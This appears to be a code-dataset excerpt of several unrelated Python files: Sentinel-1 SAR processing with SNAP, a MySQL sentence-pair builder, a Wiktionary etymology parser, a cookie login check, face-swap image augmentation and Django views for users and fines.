              -PpixelSpacingInMeter=\'{}\'\
              -PdemName=\'{}\'\
              -t {} {}'\
        .format(gpt_file, 2, resolution, dem,
                outfile, infile)
    return_code = h.run_command(command, logfile)
    if return_code == 0:
        logger.debug('INFO: Succesfully orthorectified product.')
    else:
        logger.debug('ERROR: Geocoding exited with an error. \
            See {} for Snap Error output'.format(logfile))
        # sys.exit(122)
    return return_code
def _terrain_correction_deg(infile, outfile, logfile, resolution=0.001,
                            dem='SRTM 1sec HGT'):
    '''A wrapper around SNAP's Terrain Correction routine
    This function takes an OST calibrated Sentinel-1 product and
    does the geocodification. Same as _terrain_correction, but the
    output pixel spacing is given in degrees instead of meters.
    Args:
        infile: string or os.path object for
                an OST imported frame in BEAM-Dimap format (i.e. *.dim)
        outfile: string or os.path object for the output
                 file written in BEAM-Dimap format
        logfile: string or os.path object for the file
                 where SNAP'S STDOUT/STDERR is written to
        resolution (float): the resolution of the output product in degree
        dem (str): A Snap compliant string for the dem to use.
                   Possible choices are:
                       'SRTM 1sec HGT'(default)
                       'SRTM 3sec'
                       'ASTER 1sec GDEM'
                       'ACE30'
    Returns:
        int: return code of the gpt subprocess (0 on success)
    '''
    # get gpt file
    gpt_file = h.gpt_path()
    logger.debug("INFO: Geocoding input scene")
    # in-string continuations: leading spaces end up in the command (benign)
    command = '{} Terrain-Correction -x -q {} \
              -PdemResamplingMethod=\'BILINEAR_INTERPOLATION\'\
              -PimgResamplingMethod=\'BILINEAR_INTERPOLATION\'\
              -PnodataValueAtSea=\'false\'\
              -PpixelSpacingInDegree=\'{}\'\
              -PdemName=\'{}\'\
              -t {} {}'\
        .format(gpt_file, 2, resolution, dem,
                outfile, infile)
    return_code = h.run_command(command, logfile)
    if return_code == 0:
        logger.debug('INFO: Succesfully orthorectified product.')
    else:
        logger.debug('ERROR: Geocoding exited with an error. \
            See {} for Snap Error output'.format(logfile))
        # sys.exit(122)
    return return_code
def burst_to_ard(
        master_file,
        swath,
        master_burst_nr,
        master_burst_id,
        master_burst_poly,
        out_dir,
        out_prefix,
        temp_dir,
        polarimetry=False,
        pol_speckle_filter=False,
        resolution=20,
        product_type='GTCgamma',
        speckle_filter=False,
        to_db=False,
        ls_mask_create=False,
        dem='SRTM 1sec HGT'
):
    '''The main routine to turn a burst into an ARD product

    Processing chain: burst import -> (optional) H-A-alpha decomposition
    -> calibration -> (optional) speckle filter -> (optional) dB scaling
    -> terrain correction -> (optional) layover/shadow mask. Intermediate
    products live in temp_dir and are moved to out_dir on success; on any
    failure temp_dir is wiped and the failing step's code is returned.

    Args:
        master_file (str): path to full master SLC scene (a 1-element
                           list is also accepted)
        swath (str): subswath
        master_burst_nr (): index number of the burst
        master_burst_id ():
        master_burst_poly (): burst WKT used for faster calibration
        out_dir (str):
        out_prefix (str): prefix for the output file names
        temp_dir (str):
        polarimetry (bool):
        pol_speckle_filter (bool):
        resolution (int):
        product_type (str):
        speckle_filter (bool):
        to_db (bool):
        ls_mask_create (bool):
        dem (str):

    Returns:
        int: 0 on success (or when the output already exists), otherwise
             the return code of the first failing processing step

    Raises:
        RuntimeError: if master_file is empty, None or a list that does
                      not contain exactly one path
    '''
    # validate the input: we need exactly one scene path
    if len(master_file) != 1 and isinstance(master_file, list) \
            or master_file == '' or master_file is None:
        # BUGFIX: the message was previously passed logging-style
        # ('%s', args) to RuntimeError, which never interpolates the
        # placeholders; format the message explicitly instead.
        raise RuntimeError(
            'No or invalid file in swath {} burst {}, input: {}'.format(
                swath, master_burst_id, master_file
            )
        )
    if isinstance(master_file, list):
        master_file = master_file[0]
    # Check for empty spaces in prefix
    out_prefix = out_prefix.replace(' ', '_')
    # import master
    master_import = opj(temp_dir, '{}_import'.format(master_burst_id))
    out_ard_path = opj(out_dir, '{}_{}_BS'.format(out_prefix, master_burst_id))
    # skip bursts that already have a final backscatter product
    if os.path.isfile(out_ard_path+'.dim'):
        return_code = 0
        logger.debug('File for burst %s and its swath exists, skipping!',
                     master_burst_id
                     )
        return return_code
    if not os.path.exists('{}.dim'.format(master_import)):
        import_log = opj(out_dir, '{}_import.err_log'.format(master_burst_id))
        return_code = _import(master_file, master_import, import_log,
                              swath, master_burst_nr)
        if return_code != 0:
            h.remove_folder_content(temp_dir)
            return return_code
    if polarimetry:
        # create HAalpha file
        out_haa = opj(temp_dir, '{}_h'.format(master_burst_id))
        haa_log = opj(out_dir, '{}_haa.err_log'.format(
            master_burst_id))
        return_code = _ha_alpha('{}.dim'.format(master_import),
                                out_haa, haa_log, pol_speckle_filter)
        if return_code != 0:
            h.remove_folder_content(temp_dir)
            return return_code
        # geo code HAalpha
        out_htc = opj(temp_dir, '{}_ha_alpha'.format(master_burst_id))
        haa_tc_log = opj(out_dir, '{}_haa_tc.err_log'.format(
            master_burst_id))
        # BUGFIX: the return code of the terrain correction was ignored
        return_code = _terrain_correction(
            '{}.dim'.format(out_haa), out_htc, haa_tc_log, resolution, dem)
        if return_code != 0:
            h.remove_folder_content(temp_dir)
            return return_code
        # last check on the output files
        return_code = h.check_out_dimap(out_htc)
        if return_code != 0:
            h.remove_folder_content(temp_dir)
            return return_code
        # move to final destination
        h.move_dimap(
            out_htc, opj(out_dir, '{}_ha_alpha'.format(master_burst_id)))
        # remove HAalpha tmp files
        h.delete_dimap(out_haa)
    # Calibrate
    out_cal = opj(temp_dir, '{}_cal'.format(master_burst_id))
    cal_log = opj(out_dir, '{}_cal.err_log'.format(master_burst_id))
    return_code = _calibration(
        '{}.dim'.format(master_import),
        out_cal,
        cal_log,
        product_type,
        region=master_burst_poly
    )
    if return_code != 0:
        h.remove_folder_content(temp_dir)
        return return_code
    # remove imports
    h.delete_dimap(master_import)
    # speckle filtering
    if speckle_filter:
        speckle_import = opj(temp_dir, '{}_speckle_import'.format(
            master_burst_id))
        speckle_log = opj(out_dir, '{}_speckle.err_log'.format(
            master_burst_id))
        return_code = _speckle_filter('{}.dim'.format(out_cal),
                                      speckle_import, speckle_log)
        if return_code != 0:
            h.remove_folder_content(temp_dir)
            return return_code
        # remove temp file
        h.delete_dimap(out_cal)
        # reset out_cal for next routine
        out_cal = speckle_import
    if to_db:
        out_db = opj(temp_dir, '{}_cal_db'.format(master_burst_id))
        db_log = opj(out_dir, '{}_cal_db.err_log'.format(master_burst_id))
        return_code = _linear_to_db('{}.dim'.format(out_cal), out_db, db_log)
        if return_code != 0:
            h.remove_folder_content(temp_dir)
            return return_code
        # remove tmp files
        h.delete_dimap(out_cal)
        # set out_cal to out_db for further processing
        out_cal = out_db
    # geo code backscatter products
    out_tc = opj(temp_dir, '{}_{}_BS'.format(out_prefix, master_burst_id))
    tc_log = opj(out_dir, '{}_BS_tc.err_log'.format(master_burst_id))
    # BUGFIX: the return code of the terrain correction was ignored
    return_code = _terrain_correction(
        '{}.dim'.format(out_cal), out_tc, tc_log, resolution, dem)
    if return_code != 0:
        h.remove_folder_content(temp_dir)
        return return_code
    # last check on backscatter data
    return_code = h.check_out_dimap(out_tc)
    if return_code != 0:
        h.remove_folder_content(temp_dir)
        return return_code
    # we move backscatter to final destination
    h.move_dimap(
        out_tc, opj(out_dir, '{}_{}_BS'.format(out_prefix, master_burst_id))
    )
    if ls_mask_create:
        # create LS map
        out_ls = opj(temp_dir, '{}_{}_LS'.format(out_prefix, master_burst_id))
        ls_log = opj(out_dir, '{}_LS.err_log'.format(master_burst_id))
        return_code = _ls_mask('{}.dim'.format(out_cal), out_ls, ls_log,
                               resolution, dem)
        if return_code != 0:
            h.remove_folder_content(temp_dir)
            return return_code
        # last check on ls data
        return_code = h.check_out_dimap(out_ls, test_stats=False)
        if return_code != 0:
            h.remove_folder_content(temp_dir)
            return return_code
        # move ls data to final destination
        h.move_dimap(out_ls, opj(
            out_dir,
            '{}_{}_LS'.format(out_prefix, master_burst_id))
        )
    # remove calibrated files
    h.delete_dimap(out_cal)
    # write file, so we know this burst has been succesfully processed
    if return_code == 0:
        check_file = opj(out_dir, '.processed')
        with open(str(check_file), 'w') as file:
            file.write('passed all tests \n')
    else:
        # best-effort cleanup; never mask the original return code
        try:
            h.remove_folder_content(temp_dir)
            h.remove_folder_content(out_dir)
        except Exception as e:
            logger.debug(e)
    return return_code
def _2products_coherence_tc(
        master_scene,
        master_file,
        master_burst_poly,
        slave_scene,
        slave_file,
        out_dir,
        temp_dir,
        swath,
        master_burst_id,
        master_burst_nr,
        slave_burst_id,
        slave_burst_nr,
        resolution=20,
        dem='SRTM 1Sec HGT',
        dem_file='',
        resampling='BILINEAR_INTERPOLATION',
        polar='VV,VH,HH,HV'
):
    '''Produce a terrain-corrected coherence product from two SLC bursts.

    Imports the master and slave bursts, verifies that both actually
    contain data, co-registers them, estimates the coherence and
    geocodes the result into out_dir. Intermediates are kept in temp_dir
    and removed as the chain progresses.

    Args:
        master_scene / slave_scene: scene objects; only their
            ``start_date`` attribute is used for the output file name
        master_file / slave_file: paths to the original SLC scenes
        master_burst_poly: WKT of the master burst, used to subset during
            co-registration
        out_dir (str) / temp_dir (str): output and scratch directories
        swath (str): the IW subswath of both bursts
        master_burst_id / slave_burst_id: burst identifiers (file naming)
        master_burst_nr / slave_burst_nr: burst indices in the annotation
        resolution (int): output resolution in meters
        dem (str): SNAP-compliant DEM name
        dem_file (str): currently unused
        resampling (str): currently unused
        polar (str): comma-separated polarisations to import

    Returns:
        int: 0 on success, 333 if a burst contains no data, otherwise the
             return code of the first failing processing step
    '''
    warnings.filterwarnings("ignore", category=NotGeoreferencedWarning)
    return_code = None
    # import master
    master_import = opj(temp_dir, '{}_import'.format(master_burst_id))
    if not os.path.exists('{}.dim'.format(master_import)):
        import_log = opj(out_dir, '{}_import.err_log'.format(master_burst_id))
        return_code = _import(
            infile=master_file,
            out_prefix=master_import,
            logfile=import_log,
            swath=swath,
            burst=master_burst_nr,
            polar=polar
        )
        if return_code != 0:
            h.remove_folder_content(temp_dir)
            return return_code
    # check if master has data or not (any all-zero q-band means no data)
    data_path = opj(temp_dir, '{}_import.data'.format(master_burst_id))
    if not os.path.exists(data_path):
        return 333
    for f in os.listdir(data_path):
        if f.endswith('.img') and 'q' in f:
            f = opj(data_path, f)
            with rasterio.open(f, 'r') as in_img:
                if not in_img.read(1).any():
                    return_code = 333
                else:
                    return_code = 0
    if return_code != 0:
        # remove imports
        h.delete_dimap(master_import)
        return return_code
    # import slave
    slave_import = opj(temp_dir, '{}_slave_import'.format(slave_burst_id))
    import_log = opj(out_dir, '{}_slave_import.err_log'.format(slave_burst_id))
    return_code = _import(
        infile=slave_file,
        out_prefix=slave_import,
        logfile=import_log,
        swath=swath,
        burst=slave_burst_nr,
        polar=polar
    )
    if return_code != 0:
        h.remove_folder_content(temp_dir)
        return return_code
    # check if slave has data or not
    # BUGFIX: the path was built with master_burst_id although the slave
    # import above is written under slave_burst_id, so the wrong (usually
    # missing) directory was inspected and 333 was returned spuriously.
    data_path = opj(temp_dir, '{}_slave_import.data'.format(slave_burst_id))
    if not os.path.exists(data_path):
        return 333
    for f in os.listdir(data_path):
        if f.endswith('.img') and 'q' in f:
            f = opj(data_path, f)
            with rasterio.open(f, 'r') as in_img:
                if not in_img.read(1).any():
                    return_code = 333
                else:
                    return_code = 0
    if return_code != 0:
        # remove imports
        h.delete_dimap(slave_import)
        return return_code
    # co-registration
    out_coreg = opj(temp_dir, '{}_coreg'.format(master_burst_id))
    coreg_log = opj(out_dir, '{}_coreg.err_log'.format(master_burst_id))
    logger.debug('{}.dim'.format(master_import))
    logger.debug('{}.dim'.format(slave_import))
    return_code = _coreg2('{}.dim'.format(master_import),
                          '{}.dim'.format(slave_import),
                          out_coreg,
                          coreg_log,
                          dem,
                          master_burst_poly
                          )
    if return_code != 0:
        h.remove_folder_content(temp_dir)
        return return_code
    # remove imports
    h.delete_dimap(master_import)
    h.delete_dimap(slave_import)
    # calculate coherence and deburst
    out_coh = opj(temp_dir, '{}_c'.format(master_burst_id))
    coh_log = opj(out_dir, '{}_coh.err_log'.format(master_burst_id))
    return_code = _coherence('{}.dim'.format(out_coreg),
                             out_coh, coh_log
                             )
    if return_code != 0:
        h.remove_folder_content(temp_dir)
        return return_code
    # remove coreg tmp files
    h.delete_dimap(out_coreg)
    # geocode
    out_tc = opj(temp_dir, '{}_{}_{}_coh'.format(master_scene.start_date,
                                                 slave_scene.start_date,
                                                 master_burst_id
                                                 )
                 )
    tc_log = opj(out_dir, '{}_coh_tc.err_log'.format(master_burst_id)
                 )
    # BUGFIX: the return code of the terrain correction was ignored
    return_code = _terrain_correction(
        '{}.dim'.format(out_coh),
        out_tc,
        tc_log,
        resolution,
        dem
    )
    if return_code != 0:
        h.remove_folder_content(temp_dir)
        return return_code
    # last check on coherence data
    return_code = h.check_out_dimap(out_tc)
    if return_code != 0:
        h.remove_folder_content(temp_dir)
        return return_code
    # move to final destination
    h.move_dimap(out_tc, opj(out_dir, '{}_{}_{}_coh'.format(master_scene.start_date,
                                                            slave_scene.start_date,
                                                            master_burst_id)
                             )
                 )
    # remove tmp files
    h.delete_dimap(out_coh)
    # write file, so we know this burst has been succesfully processed
    if return_code == 0:
        check_file = opj(out_dir, '.processed')
        with open(str(check_file), 'w') as file:
            file.write('passed all tests \n')
    else:
        h.remove_folder_content(temp_dir)
        h.remove_folder_content(out_dir)
    return return_code
|
15,161 | 885b2532998ee2091f0e3a410eebd4cffa24df89 |
import MySQLdb
import MySQLdb.cursors
import sys
from time import *
# DB connection information
# DB host
host = 'localhost'
# DB user
user = 'dbuser'
# DB password
passwd = 'password'
# Name of used DB
dbName = 'deu_mixed_2011'
# config
# every word id less or equal this value will be ignored
wordIdBoundary = 87839
# size of length of every word vector
countOfWords = 5
# number of sentences to process, -1 indicates to process all sentences in export file
countOfSentences = -1
# create db connection
db = MySQLdb.connect(host = host,
user = user,
passwd = passwd,
db = dbName,
cursorclass = MySQLdb.cursors.SSCursor)
def createWordVectors(inputFile, countOfSentences):
    """Write per-sentence word vectors to the file 'wordvectors'.

    Reads "(sentenceId, wordId)" tuples (one per line) from inputFile,
    skips word ids <= the module-global wordIdBoundary, and keeps the
    countOfWords highest word ids per sentence. A sentence's vector is
    only written once it has exactly countOfWords items.

    Args:
        inputFile: iterable of lines, each a "(sId, wId)" tuple literal
        countOfSentences: number of sentences to process; -1 means all
    """
    print("Creating word vector")
    import bisect
    with open("wordvectors", "w") as file:
        # init vector
        vector = {"key": -1, "items": []}
        for inputLine in inputFile:
            if countOfSentences == 0:
                break
            # NOTE(review): eval() on file content — only safe for
            # trusted export files; consider ast.literal_eval.
            sId, wId = eval(inputLine.replace("\n", ""))
            # ignore top words
            if wId <= wordIdBoundary:
                continue
            if vector["key"] == -1: #first wordvector
                vector["key"] = sId
                vector["items"] = [wId]
            elif sId == vector["key"]:
                # insert new wId in ascending order
                bisect.insort(vector["items"], wId)
                # delete the first item if length of list is greater than countOfWords
                if len(vector["items"]) > countOfWords:
                    del vector["items"][0]
            else:
                if len(vector["items"]) == countOfWords:
                    file.write(str(vector) + "\n")
                vector["key"] = sId
                vector["items"] = [wId]
                countOfSentences -= 1
        else:
            # BUGFIX: the final sentence's vector was silently dropped at
            # EOF; flush it here (only when the loop was not cut short by
            # the countOfSentences limit).
            if vector["key"] != -1 and len(vector["items"]) == countOfWords:
                file.write(str(vector) + "\n")
def createSentenceVectors():
    """Invert "wordvectors" (sentence -> words) into "sentencevectors" (word -> sentences).

    For each word vector, every word id either extends an existing
    sentence-vector line (file rewritten in place via fileinput) or appends
    a new {"key": w_id, "items": [s_id]} line.  Consumes and then deletes
    the "wordvectors" file.
    """
    print("Creating sentence vector")
    import ast
    import os
    import fileinput
    with open("wordvectors", "r+") as file:
        # start from an empty sentence-vector file
        open("sentencevectors", "w").close()
        for line in file:
            wordVector = ast.literal_eval(line.replace("\n", ""))
            # rewrite sentencevectors in place: stdout is redirected into the file
            sentenceVectorFile = fileinput.input(files=("sentencevectors"), inplace=True)
            for svLine in sentenceVectorFile:
                sentenceVector = ast.literal_eval(svLine.replace("\n", ""))
                # if this sentence-vector's word occurs in the word vector,
                # record the sentence there and mark the word as handled
                if sentenceVector["key"] in wordVector["items"]:
                    sentenceVector["items"].append(wordVector["key"])
                    wordVector["items"].remove(sentenceVector["key"])
                # write the (possibly updated) line back; py3-compatible
                # replacement for the original `print str(...) + "\n",`
                print(str(sentenceVector))
            sentenceVectorFile.close()
            # any word ids not matched above start their own sentence vector
            if len(wordVector["items"]) > 0:
                with open("sentencevectors", "a") as svFile:
                    for wId in wordVector["items"]:
                        svFile.write(str({"key": wId, "items": [wordVector["key"]]}) + "\n")
    # os was referenced but never imported at module level in this file
    os.remove("wordvectors")
def createSentencePairs():
    """Expand every sentence vector into all unordered sentence-id pairs.

    Each {"key": w_id, "items": [s_id, ...]} line of "sentencevectors"
    yields one "a b" line in "pairs" per pair of sentences sharing that
    word, smaller id first.  Consumes and then deletes "sentencevectors".
    """
    print("Create sentence pairs")
    import ast
    import os
    with open("pairs", "w") as pairsFile, open("sentencevectors", "r") as svFile:
        for line in svFile:
            # literal_eval replaces the original unsafe eval()
            sentences = ast.literal_eval(line.replace("\n", ""))["items"]
            # copy the current sentence vector so we can consume it
            dummySet = list(sentences)
            # pair every sId with every other sId in this sentence vector
            while(1 < len(dummySet)):
                sentence1 = dummySet.pop()
                for sentence2 in dummySet:
                    # save each new pair in ascending order
                    if sentence1 < sentence2:
                        pairsFile.write(str(sentence1) + " " + str(sentence2) + "\n")
                    else:
                        pairsFile.write(str(sentence2) + " " + str(sentence1) + "\n")
    # os was referenced but never imported at module level in this file
    os.remove("sentencevectors")
def getSentences(dbConn, fileName):
    """Write the sentence texts for every pair in "sorted-counted-pairs".

    Each input line looks like "<count> <sid1> <sid2>"; for both ids the
    sentence row is fetched from the `sentences` table and written to
    fileName, pairs separated by a dashed ruler.
    """
    with open(fileName, "w") as newFile, open("sorted-counted-pairs", "r+") as pairsFile:
        for line in pairsFile:
            sid1, sid2 = line.strip().split(" ")[1:]
            # Validate the ids as integers before interpolating them into SQL;
            # the original concatenated raw file content into the query string.
            sid1, sid2 = int(sid1), int(sid2)
            query1 = "select sentence from sentences where s_id = " + str(sid1)
            query2 = "select sentence from sentences where s_id = " + str(sid2)
            cursor = dbConn.cursor()
            cursor.execute(query1)
            s1 = cursor.fetchone()
            cursor.close()
            cursor = dbConn.cursor()
            cursor.execute(query2)
            s2 = cursor.fetchone()
            cursor.close()
            # str(row) keeps the original tuple-repr output format
            newFile.write(str(sid1) + ":\t" + str(s1) + "\n")
            newFile.write(str(sid2) + ":\t" + str(s2) + "\n")
            newFile.write("------------------\n")
if __name__ == "__main__":
    # Pipeline driver: export (s_id, w_id) from MySQL once, sort it on disk,
    # then run the three vector/pair-building passes over the flat files.
    import os.path
    fileName = dbName
    # if file not exists get inverse list from database and sort file
    if not os.path.isfile(fileName):
        print("Exporting s_id, w_id from inv_w...")
        query = "SELECT s_id, w_id FROM inv_w"
        c1 = db.cursor()
        c1.execute(query)
        # stream row by row (SSCursor) so the full table never sits in memory
        with open(fileName, "w") as export:
            row = c1.fetchone()
            while row is not None:
                export.write(str(row) + "\n")
                row = c1.fetchone()
        c1.close()
        # sort export file in ascending order
        # NOTE(review): shells out to GNU sort; requires `sort --parallel`
        # on PATH — confirm target platform.
        import subprocess
        import shutil
        subprocess.call(["sort", "--parallel=3", "-o", "temp", fileName])
        shutil.move("temp", fileName)
    with open(fileName, "r+") as export:
        createWordVectors(export, countOfSentences)
    createSentenceVectors()
    createSentencePairs()
|
15,162 | d31722f4a31ba90395b10285e90bc2b99cee70e1 | # -*- coding: utf-8 -*-
from lxml import etree
import argparse
import os
import re
import sys
from reader import chunker
import languages
langs = re.compile('\{\{etyl.+?(?:lang=)?(\w+)\}\}', re.I)
def consolidate_iso(iso):
    """Normalise an ISO code to the canonical code for its language name."""
    language_name = languages.iso2name[iso]
    return languages.name2iso[language_name]
def parse_page(page):
    """Parse one wiktionary <page> XML fragment.

    Returns a pair (word, source_languages), e.g.
    ('Burgundy', ['fr', 'hy', 'la', 'la', 'la']) or ('Burunika', []).
    """
    tree = etree.fromstring(page)
    title = tree.xpath('/page/title')[0].text
    body_text = tree.xpath('/page/revision/text')[0].text
    # pages with an empty revision body contribute no etymology codes
    source_codes = langs.findall(body_text) if body_text else []
    return title, source_codes
# CLI: --take N stops after roughly N pages (useful for sampling).
parser = argparse.ArgumentParser(description='Wiktionary parser')
parser.add_argument('--take', type=int)
opts = parser.parse_args()
# Dump location comes from the $CORPORA environment variable.
corpora_path = os.environ['CORPORA']
wiktionary_xml = corpora_path + '/wiktionary/enwiktionary-20130503-pages-articles-multistream.xml'
with open(wiktionary_xml) as wiktionary_fp:
    counter = 0
    # chunker yields one <page>...</page> fragment at a time
    for page in chunker(wiktionary_fp, ' <page>\n', ' </page>\n'):
        word, page_isos = parse_page(page)
        # if not word.startswith('Wiktionary:'):
        if len(page_isos) > 0:
            # languages.iso2name will not contain iso mostly in weird, typo-ish cases
            page_isos = [consolidate_iso(iso) for iso in page_isos if iso in languages.iso2name]
            # page_languages = sorted(list(set(page_languages)))
            line = '%s\t%s\n' % (word, ','.join(page_isos))
            # NOTE(review): writing encoded bytes to sys.stdout only works on
            # Python 2 — on Python 3 this raises TypeError; confirm runtime.
            sys.stdout.write(line.encode('utf8'))
            sys.stdout.flush()
        counter += 1
        # progress counter on stderr every 100 pages
        if counter % 100 == 0:
            sys.stderr.write('\r%7d' % counter)
            sys.stderr.flush()
        if opts.take and counter > opts.take:
            break
|
15,163 | 90bc4dac85d52035dc619b042ef3d00296294932 | import SignIn
import Signup
from Handler import Handler
def valid_login_cookie(cookie):
    """Return a truthy user object when the cookie is authentic, else falsy."""
    name = cookie.split('|')[0]
    if cookie != SignIn.make_secure(name):
        return False
    # signature is valid: confirm the named user actually exists
    return Signup.User.get_user_by_name(name)
class Welcome(Handler):
    """Greets a signed-in user; bounces anonymous visitors to signup."""
    page_title = "Welcome"

    def get(self):
        cookie = self.request.cookies.get("user", None)
        if cookie and valid_login_cookie(cookie):
            # cookie format is "<username>|<signature>"
            self.render("welcome.html", user=cookie.split('|')[0])
        else:
            self.redirect("/signup")
|
15,164 | 13d2da65726c81d838a77b17c801a43814754bd8 | import os
import cv2
import numpy as np
from random import shuffle
from skimage import transform
from constants import random_transform_args
from constants import face_coverage
def get_transpose_axes(n):
    """Split axis indices 0..n-1 into (y_axes, x_axes, [last]).

    Axes before the last one alternate between the two groups; which parity
    goes to y depends on whether n is even.
    """
    even = n % 2 == 0
    y_start, x_start = (1, 0) if even else (0, 1)
    y_axes = list(range(y_start, n - 1, 2))
    x_axes = list(range(x_start, n - 1, 2))
    return y_axes, x_axes, [n - 1]
def stack_images(images):
    """Tile a batch of images into one mosaic array.

    The alternating-axis split (inlined from get_transpose_axes) groups the
    dimensions into row-like and column-like axes, which are then merged.
    """
    shape = np.array(images.shape)
    n = len(shape)
    if n % 2 == 0:
        y_axes = list(range(1, n - 1, 2))
        x_axes = list(range(0, n - 1, 2))
    else:
        y_axes = list(range(0, n - 1, 2))
        x_axes = list(range(1, n - 1, 2))
    axis_groups = (y_axes, x_axes, [n - 1])
    merged_shape = [np.prod(shape[group]) for group in axis_groups]
    reordered = np.transpose(images, axes=np.concatenate(axis_groups))
    return reordered.reshape(merged_shape)
def random_warp(image, coverage=face_coverage):
    """Return (warped_image, target_image) for a 256x256x3 input face.

    A 5x5 grid of control points centred on the image is jittered with
    Gaussian noise; the warped 64x64 crop is produced with cv2.remap, and
    the 64x64 target is the similarity-transform fit to the same points.
    """
    assert image.shape == (256, 256, 3)
    # 5 evenly spaced control coordinates covering `coverage` pixels around centre
    range_ = np.linspace(128 - coverage // 2, 128 + coverage // 2, 5)
    mapx = np.broadcast_to(range_, (5, 5))
    mapy = mapx.T
    # jitter the grid (two RNG draws — call order matters for reproducibility)
    mapx = mapx + np.random.normal(size=(5, 5), scale=5)
    mapy = mapy + np.random.normal(size=(5, 5), scale=5)
    # upsample the coarse maps and crop the interior to 64x64
    interp_mapx = cv2.resize(mapx, (80, 80))[8:72, 8:72].astype('float32')
    interp_mapy = cv2.resize(mapy, (80, 80))[8:72, 8:72].astype('float32')
    warped_image = cv2.remap(image, interp_mapx, interp_mapy, cv2.INTER_LINEAR)
    src_points = np.stack([mapx.ravel(), mapy.ravel()], axis=-1)
    dst_points = np.mgrid[0:65:16, 0:65:16].T.reshape(-1, 2)
    # best-fit similarity transform from jittered points to the regular grid
    mat = transform.SimilarityTransform()
    mat.estimate(src_points, dst_points)
    target_image = cv2.warpAffine(image, mat.params[0:2], (64, 64))
    return warped_image, target_image
def random_transform(image,
                     rotation_range,
                     zoom_range,
                     shift_range,
                     random_flip):
    """Apply a random rotation/zoom/shift (and maybe horizontal flip) to image.

    rotation_range is in degrees, zoom_range a fraction around 1.0,
    shift_range a fraction of width/height, random_flip the flip probability.
    """
    h, w = image.shape[0:2]
    rotation = np.random.uniform(-rotation_range, rotation_range)
    scale = np.random.uniform(1 - zoom_range, 1 + zoom_range)
    tx = np.random.uniform(-shift_range, shift_range) * w
    ty = np.random.uniform(-shift_range, shift_range) * h
    # rotation+scale about the image centre, then add the translation
    mat = cv2.getRotationMatrix2D((w // 2, h // 2), rotation, scale)
    mat[:, 2] += (tx, ty)
    result = cv2.warpAffine(
        image, mat, (w, h), borderMode=cv2.BORDER_REPLICATE)
    if np.random.random() < random_flip:
        # horizontal mirror
        result = result[:, ::-1]
    return result
def read_image(img_path, random_transform_args=random_transform_args):
    """Load an image and return an augmented (warped, target) training pair.

    The default argument binds the module-level random_transform_args dict
    at definition time.
    """
    # NOTE(review): cv2.imread returns None for unreadable paths, which
    # makes the division raise TypeError — confirm inputs are validated.
    image = cv2.imread(img_path) / 255.0
    image = cv2.resize(image, (256, 256))
    image = random_transform(image, **random_transform_args)
    warped_img, target_img = random_warp(image)
    return warped_img, target_img
def minibatch(image_list, batchsize):
    """Infinite generator of (epoch, warped_batch, target_batch).

    Shuffles image_list in place (the caller's list is mutated) and bumps
    the epoch counter each time the list is exhausted.
    """
    length = len(image_list)
    epoch = i = 0
    shuffle(image_list)
    while True:
        size = batchsize
        # reshuffle and restart when the next batch would run off the end
        # NOTE(review): assumes batchsize <= len(image_list) — confirm callers.
        if i + size > length:
            shuffle(image_list)
            i = 0
            epoch += 1
        # each read_image() returns a (warped, target) pair -> axis 1 below
        images = np.float32([read_image(image_list[j])
                             for j in range(i, i + size)])
        warped_img, target_img = images[:, 0, :, :, :], images[:, 1, :, :, :]
        i += size
        yield epoch, warped_img, target_img
def minibatchAB(image_list, batchsize):
    """Thin pass-through over minibatch(); kept for API symmetry."""
    yield from minibatch(image_list, batchsize)
def get_image_paths(img_dir):
    """Return the full path of every entry directly inside img_dir."""
    entries = os.listdir(img_dir)
    return [os.path.join(img_dir, name) for name in entries]
|
15,165 | 306a08ebc719484c8a43af6a14304dbd1a8f9521 | #-*- encoding: utf-8 -*-
from django.shortcuts import render_to_response, get_object_or_404
from django.http import HttpResponse
from django.template import RequestContext
from multa.controleUsuario.models import Usuario
from multa.controleUsuario.models import Multa
from multa.controleUsuario.forms import FormCadastro
from multa.controleUsuario.forms import FormCadastroMulta
def index(request):
    """Landing page: renders the base layout with no extra context."""
    empty_context = {}
    return render_to_response('base.html', empty_context)
def cadastro(request):
    """Registration overview: lists every user and every fine."""
    context = {
        'usuario_lista': Usuario.objects.all(),
        'multa_lista': Multa.objects.all(),
    }
    return render_to_response('cadastroUsuario.html', context)
def adiciona(request):
    """Create a new user from the submitted form, or show a blank form."""
    if request.method != "POST":
        form = FormCadastro()
    else:
        form = FormCadastro(request.POST, request.FILES)
        if form.is_valid():
            form.save()
            return render_to_response("salvo.html", {})
    # GET, or POST with validation errors: render the (possibly bound) form
    return render_to_response("UsuarioAdiciona.html", {'form': form},
                              context_instance=RequestContext(request))
def adicionaMulta(request):
    """Create a new fine (multa) from the submitted form, or show a blank form."""
    if request.method != "POST":
        form = FormCadastroMulta()
    else:
        form = FormCadastroMulta(request.POST, request.FILES)
        if form.is_valid():
            form.save()
            return render_to_response("salvo.html", {})
    # GET, or POST with validation errors: render the (possibly bound) form
    return render_to_response("adicionaMulta.html", {'form': form},
                              context_instance=RequestContext(request))
def editarUsuario(request, nr_id):
    """Edit the user identified by primary key nr_id (404 if missing)."""
    usuario = get_object_or_404(Usuario, pk=nr_id)
    if request.method != "POST":
        form = FormCadastro(instance=usuario)
    else:
        form = FormCadastro(request.POST, request.FILES, instance=usuario)
        if form.is_valid():
            form.save()
            return render_to_response("salvo.html", {})
    return render_to_response("editarUsuario.html", {'form': form},
                              context_instance=RequestContext(request))
def editarMulta(request, nr_id):
    """Edit the fine identified by primary key nr_id (404 if missing)."""
    multa = get_object_or_404(Multa, pk=nr_id)
    if request.method != "POST":
        form = FormCadastroMulta(instance=multa)
    else:
        form = FormCadastroMulta(request.POST, request.FILES, instance=multa)
        if form.is_valid():
            form.save()
            return render_to_response("salvo.html", {})
    return render_to_response("editarMulta.html", {'form': form},
                              context_instance=RequestContext(request))
|
15,166 | 04ab4ac69071fa18bf94726989689284bf15f1ae | coin=("adzcoin", "auroracoin-qubit", "bitcoin", "bitcoin-cash", "bitcoin-gold", "dash", "digibyte-groestl",
"digibyte-qubit", "digibyte-skein", "electroneum", "ethereum", "ethereum-classic", "expanse", "feathercoin",
"gamecredits", "geocoin", "globalboosty", "groestlcoin", "litecoin","maxcoin", "monacoin","monero","musicoin",
"myriadcoin-groestl","myriadcoin-skein", "myriadcoin-yescrypt", "sexcoin", "siacoin", "startcoin", "verge-scrypt",
"vertcoin", "zcash", "zclassic", "zcoin", "zencash") |
15,167 | 516f36f7bd685cec34f425a49b8f3804f6745fb7 | # -*- coding: utf-8 -*-
"""
@author: lennin
Vista Base para heredar.
